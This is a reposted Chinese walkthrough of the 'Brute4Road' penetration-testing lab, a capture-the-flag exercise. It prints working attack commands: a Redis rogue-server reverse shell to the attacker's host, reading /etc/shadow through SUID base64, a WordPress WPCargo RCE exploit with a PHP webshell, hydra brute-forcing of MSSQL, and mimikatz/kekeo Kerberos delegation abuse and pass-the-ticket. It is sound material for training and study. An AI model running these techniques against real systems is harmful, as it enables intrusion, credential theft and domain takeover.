【渗透测试】春秋云镜靶场-Brute4Road

admin 2024年10月13日15:58:48评论26 views字数 3811阅读12分42秒阅读模式
点击蓝字
【渗透测试】春秋云镜靶场-Brute4Road
关注我们

【渗透测试】春秋云镜靶场-Brute4Road

【渗透测试】春秋云镜靶场-Brute4Road
【渗透测试】春秋云镜靶场-Brute4Road
微信搜一搜
【渗透测试】春秋云镜靶场-Brute4Road
暗魂攻防实验室

靶标介绍:Brute4Road是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。【渗透测试】春秋云镜靶场-Brute4Road开局一个IP

39.xx.xx.xx

扫描结果,有个未授权redis

39.xx.xx.xx:21 open39.xx.xx.xx:22 open39.xx.xx.xx:80 open39.xx.xx.xx:6379 open[*] alive ports len is: 4start vulscan[*] WebTitle: http://39.xx.xx.xx       code:200 len:4833   title:Welcome to CentOS[+] Redis:39.xx.xx.xx:6379 unauthorized file:/usr/local/redis/db/dump.rdb[+] ftp://39.xx.xx.xx:21:anonymous  [->]pub

版本合适可以进行Redis主从复制getshell【渗透测试】春秋云镜靶场-Brute4Road可以使用 https://github.com/n0b0dyCN/redis-rogue-server 反弹一个shell

python3 redis-rogue-server.py --exp=exp.so --rhost 39.xx.xx.xx --rport 6379 --lhost 175.xx.xx.xx --lport 9991

【渗透测试】春秋云镜靶场-Brute4Road成功的获得了个shell,非常简单【渗透测试】春秋云镜靶场-Brute4Road发现base64 命令有suid

find / -user root -perm /4000 2>/dev/null/usr/sbin/pam_timestamp_check/usr/sbin/usernetctl/usr/sbin/unix_chkpwd/usr/bin/at/usr/bin/chfn/usr/bin/gpasswd/usr/bin/passwd/usr/bin/chage/usr/bin/base64/usr/bin/umount/usr/bin/su/usr/bin/chsh/usr/bin/sudo/usr/bin/crontab/usr/bin/newgrp/usr/bin/mount/usr/bin/pkexec/usr/libexec/dbus-1/dbus-daemon-launch-helper/usr/lib/polkit-1/polkit-agent-helper-1

可以通过

base64 /etc/shadow|base64 -d

读取系统敏感文件【渗透测试】春秋云镜靶场-Brute4Road成功读取到flag【渗透测试】春秋云镜靶场-Brute4Road

flag01: flag{ce83b1a6-1c6e-466e-90cf-4ddafc852957}

使用wget远程下载好fscan 以及 frp 这里不详细说明,具体文章可以看我前几篇靶场wp查看IP

/sbin/ifconfig

【渗透测试】春秋云镜靶场-Brute4Road

fscan扫描结果

start ping(icmp) Target 172.22.2.3     is alive(icmp) Target 172.22.2.7     is alive(icmp) Target 172.22.2.16     is alive(icmp) Target 172.22.2.18     is alive(icmp) Target 172.22.2.34     is alive[*] Icmp alive hosts len is: 5172.22.2.18:22 open172.22.2.7:80 open172.22.2.7:22 open172.22.2.7:21 open172.22.2.7:6379 open172.22.2.16:1433 open172.22.2.34:445 open172.22.2.16:445 open172.22.2.18:445 open172.22.2.3:445 open172.22.2.34:139 open172.22.2.34:135 open172.22.2.16:139 open172.22.2.3:139 open172.22.2.18:139 open172.22.2.16:135 open172.22.2.3:135 open172.22.2.16:80 open172.22.2.18:80 open172.22.2.3:88 open[*] alive ports len is: 20start vulscan[*] WebTitle:http://172.22.2.7         code:200 len:4833   title:Welcome to CentOS[+] NetInfo:[*]172.22.2.16  [->]MSSQLSERVER  [->]172.22.2.16[*] 172.22.2.34         XIAORANGCLIENT01[*] WebTitle:http://172.22.2.16       code:404 len:315   title:Not Found[*] 172.22.2.3     [+]DC XIAORANGDC               Windows Server 2016 Datacenter 14393[*] 172.22.2.16         XIAORANGMSSQLSERVER       Windows Server 2016 Datacenter 14393[+] NetInfo:[*]172.22.2.3  [->]DC  [->]172.22.2.3[+] NetInfo:[*]172.22.2.34  [->]CLIENT01  [->]172.22.2.34[*] 172.22.2.16 (Windows Server 2016 Datacenter 14393)[*] 172.22.2.18         WORKGROUPUBUNTU-WEB02[*] 172.22.2.3 (Windows Server 2016 Datacenter 14393)[+] ftp://172.22.2.7:21:anonymous  [->]pub[*] WebTitle:http://172.22.2.18       code:200 len:57738 title:又一个WordPress站点

发现一个wordpress存在WPCargo < 6.9.0 - Unauthenticated RCE使用项目:https://github.com/biulove0x/CVE-2021-25003.git直接getshell

python3 .WpCargo.py -t http://172.22.2.18/http://172.22.2.18/wp-content/wp-conf.php生成的shell为<?=$_GET[1]($_POST[2]);?>

【渗透测试】春秋云镜靶场-Brute4Road写个木马 AntSword 连接【渗透测试】春秋云镜靶场-Brute4Road找到数据库配置文件【渗透测试】春秋云镜靶场-Brute4Road连接数据库找到flag02【渗透测试】春秋云镜靶场-Brute4Road

flag02: flag{c757e423-eb44-459c-9c63-7625009910d8}

以及 一些password【渗透测试】春秋云镜靶场-Brute4Road看到内网有个mssql 服务器,尝试爆破下sa

hydra -l sa -P pass.txt 172.22.2.16 mssql -vV

【渗透测试】春秋云镜靶场-Brute4Road得到密码

sa ElGNkOiC

可以通过mssql  getshell使用MDUThttps://github.com/SafeGroceryStore/MDUT【渗透测试】春秋云镜靶场-Brute4Roadservice权限msf正向连接上线,使用getsystem提权至system【渗透测试】春秋云镜靶场-Brute4Road读取flag【渗透测试】春秋云镜靶场-Brute4Road

flag03: flag{113fb33b-35a0-4323-87a0-db30d6bbad8c}

接着使用Bloodhound分析域内情况【渗透测试】春秋云镜靶场-Brute4Road发现MSSQLSERVER被配置了约束委派

AdFind.exe -b "DC=xiaorang,DC=lab" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

【渗透测试】春秋云镜靶场-Brute4Road先用mimikatz 导出MSSQLSERVER的票据

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

【渗透测试】春秋云镜靶场-Brute4Road接着使用kekeo申请服务票据

kekeo.exe "tgs::s4u /tgt:[0;3e4]-2-1-40e10000-MSSQLSERVER$@krbtgt-XIAORANG.LAB.kirbi /user:[email protected] /service:cifs/DC.XIAORANG.LAB" "exit"

【渗透测试】春秋云镜靶场-Brute4Road在票据导入之前是无法访问DC的【渗透测试】春秋云镜靶场-Brute4Road

导入票据之后成功读取到dc的flag

mimikatz.exe "kerberos::ptt TGS_Administrator@XIAORANG.LAB@XIAORANG.LAB_cifs~DC.XIAORANG.LAB@XIAORANG.LAB.kirbi" "exit"

【渗透测试】春秋云镜靶场-Brute4Road

flag04: flag{f2e7efec-68bc-470c-b812-b1776f111ed8}
【渗透测试】春秋云镜靶场-Brute4Road
【渗透测试】春秋云镜靶场-Brute4Road

【渗透测试】Vulnhub靶场之HACK ME PLEASE

【渗透测试】Vulnhub靶场之Noob

anhunsec_redteam_V2.5 正式版红队渗透系统简介

【漏洞复现】泛微e-cology 前台未授权sql注入

【渗透测试】春秋云镜靶场-Brute4Road
【渗透测试】春秋云镜靶场-Brute4Road
微信搜一搜
【渗透测试】春秋云镜靶场-Brute4Road
暗魂攻防实验室

原文始发于微信公众号(暗魂攻防实验室):【渗透测试】春秋云镜靶场-Brute4Road

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月13日15:58:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透测试】春秋云镜靶场-Brute4Roadhttps://cn-sec.com/archives/1898681.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息